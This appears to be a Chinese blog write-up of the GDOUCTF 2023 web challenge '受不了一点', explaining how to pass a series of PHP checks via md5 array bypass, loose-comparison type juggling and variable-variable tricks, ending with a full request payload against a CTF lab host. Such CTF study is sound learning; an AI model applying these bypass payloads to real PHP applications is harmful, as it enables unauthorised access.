[GDOUCTF 2023]受不了一点

[GDOUCTF 2023]受不了一点

进入靶场:

image-20230609154958891

第一个if

if(isset($_POST['gdou'])&&isset($_POST['ctf'])){
    $b=$_POST['ctf'];
    $a=$_POST['gdou'];

就是让你给参数ctf,gdou,POST赋值

第二个if

关于md5强比较
直接使用数组类型绕过
即ctf[]=1&gdou[]=2

第三-四个if

传入cookie使cookie的值等于j0k3r
cookie=j0k3r

第五个if

让get方式传入参数aaa和bbb的值
传就行了

第六个if

if($aaa==114514 && $bbb==114514 && $aaa!=$bbb)
这里进行绕过,在任意一个114514后加一个字母
传参aaa=114514&bbb=114514a

第七个if

这里选择任意一个传入flag的方式
使用get,则flag的值在不断的遍历,对flag的值进行传递,输出flag
构造:123=flag&flag=123

最后的payload

http://node2.anna.nssctf.cn:28517/?aaa=114514&bbb=114514a&123=flag&flag=123

post传参:ctf[]=1&gdou[]=2

设置cookie:cookie=j0k3r

image-20230609155443097

posted @ 2023-06-18 19:27  Magic水瓶  阅读(273)  评论(0编辑  收藏  举报